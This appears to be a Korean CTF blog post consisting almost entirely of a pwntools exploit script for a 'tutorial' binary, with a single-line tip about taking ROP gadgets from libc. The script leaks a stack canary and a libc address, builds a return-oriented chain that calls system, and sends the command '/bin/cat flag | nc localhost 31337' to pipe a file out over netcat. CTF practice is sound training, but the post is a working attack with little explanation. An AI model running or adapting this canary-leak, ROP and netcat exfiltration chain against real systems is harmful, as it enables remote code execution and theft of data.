728x90

: ) 바이너리안에 없는 가젯은 libc에서 찾장


from pwn import *

s = remote("localhost",1233)
libc = ELF("./libc")
elf = ELF("./tutorial")

def manual():
    s.recvuntil(">")
    s.sendline("1")


def practice(content):
    s.recvuntil(">")
    s.sendline("2")
    s.recvuntil("Time to test your exploit...")
    s.sendline(content)

def quit():
    s.recvuntil(">")
    s.sendline("3")

practice("A"*311)

s.recvuntil(">")
print s.recv(312)
canary = u64(s.recv(8))
print "canary : " + hex(canary)


manual()
s.recvuntil("Reference:")
puts_libc = int(s.recv(14),16) + 1280
print "puts_libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
one_shot = libc_base + 0xf02a4
bin_sh = libc_base + next(libc.search("/bin/sh\0"))
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
print "one_shot : " + hex(one_shot)
print "bin_sh : " + hex(bin_sh)

pop_rdi = 0x004012e3
pop_rbp = 0x00400cd5
pop_rsi_r15 = 0x004012e1
pop_rdx = libc_base + 0x00001b92
cmd = "/bin/cat flag | nc localhost 31337"

pay = "A"*312
pay += p64(canary)
pay += "B"*8
pay += p64(pop_rdi)
pay += p64(4)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(system)

practice(pay)

s.send(cmd)

s.interactive()


'PWN > CTF' 카테고리의 다른 글

[BITSCTF 2017] pwn  (0) 2018.12.01
[Codegate 2017] BaskinRobins31  (0) 2018.11.30
[SHARIF 2018] OldSchool-newAge  (0) 2018.11.25
[HITCON 2016] Babyheap  (0) 2018.11.24
[Codegate_2017] Petshop  (0) 2018.11.17